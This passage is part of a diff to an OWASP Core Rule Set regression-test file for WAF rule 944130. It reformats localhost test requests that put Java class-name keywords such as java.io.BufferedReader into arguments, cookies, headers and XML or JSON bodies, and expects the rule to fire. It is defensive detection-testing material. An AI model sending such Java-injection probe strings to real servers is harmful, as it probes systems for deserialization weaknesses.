+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: com.sun.org.apache
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 17
 desc: "XML attribute value includes keyword com.sun.org.apache"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "element_value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-18
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 18
 desc: "XML element value includes keyword com.sun.org.apache"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "com.sun.org.apache"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-19
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "com.sun.org.apache"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 19
 desc: "Nested XML element value includes keyword com.sun.org.apache"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "com.sun.org.apache"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-20
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "com.sun.org.apache"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 20
 desc: "Content-Type text/plain includes keyword com.sun.org.apache"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "text/plain"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=com.sun.org.apache"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-21
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=com.sun.org.apache"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 21
 desc: "Content-Type application/json arg value includes keyword com.sun.org.apache"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"test\": \"com.sun.org.apache\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-22
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"com.sun.org.apache\"}"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 22
 desc: "Content-Type application/json arg name includes keyword com.sun.org.apache"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"com.sun.org.apache\": \"test\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-23
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"com.sun.org.apache\": \"test\"}"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 23
 desc: "Argument test includes keyword java.io.BufferedInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=java.io.BufferedInputStream"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-24
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=java.io.BufferedInputStream"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 24
 desc: "Argument name includes keyword java.io.BufferedInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.io.BufferedInputStream=test"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-25
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.io.BufferedInputStream=test"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 25
 desc: "Cookie test includes keyword java.io.BufferedInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: test=java.io.BufferedInputStream
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-26
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=java.io.BufferedInputStream
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 26
 desc: "Cookie name includes keyword java.io.BufferedInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: java.io.BufferedInputStream=test
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-27
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: java.io.BufferedInputStream=test
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 27
 desc: "Request header test includes keyword java.io.BufferedInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- test: java.io.BufferedInputStream
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-28
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: java.io.BufferedInputStream
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 28
 desc: "XML attribute value includes keyword java.io.BufferedInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "element_value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-29
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 29
 desc: "XML element value includes keyword java.io.BufferedInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.io.BufferedInputStream"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-30
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.io.BufferedInputStream"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 30
 desc: "Nested XML element value includes keyword java.io.BufferedInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.io.BufferedInputStream"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-31
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.io.BufferedInputStream"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 31
 desc: "Content-Type text/plain includes keyword java.io.BufferedInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "text/plain"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=java.io.BufferedInputStream"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-32
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=java.io.BufferedInputStream"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 32
 desc: "Content-Type application/json arg value includes keyword java.io.BufferedInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"test\": \"java.io.BufferedInputStream\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-33
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"java.io.BufferedInputStream\"}"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 33
 desc: "Content-Type application/json arg name includes keyword java.io.BufferedInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"java.io.BufferedInputStream\": \"test\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-34
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"java.io.BufferedInputStream\": \"test\"}"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 34
 desc: "Argument test includes keyword java.io.BufferedReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=java.io.BufferedReader"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-35
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=java.io.BufferedReader"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 35
 desc: "Argument name includes keyword java.io.BufferedReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.io.BufferedReader=test"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-36
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.io.BufferedReader=test"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 36
 desc: "Cookie test includes keyword java.io.BufferedReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: test=java.io.BufferedReader
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-37
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=java.io.BufferedReader
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 37
 desc: "Cookie name includes keyword java.io.BufferedReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: java.io.BufferedReader=test
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-38
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: java.io.BufferedReader=test
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 38
 desc: "Request header test includes keyword java.io.BufferedReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- test: java.io.BufferedReader
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-39
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: java.io.BufferedReader
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 39
 desc: "XML attribute value includes keyword java.io.BufferedReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "element_value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-40
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 40
 desc: "XML element value includes keyword java.io.BufferedReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.io.BufferedReader"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-41
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.io.BufferedReader"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 41
 desc: "Nested XML element value includes keyword java.io.BufferedReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.io.BufferedReader"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-42
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.io.BufferedReader"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 42
 desc: "Content-Type text/plain includes keyword java.io.BufferedReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
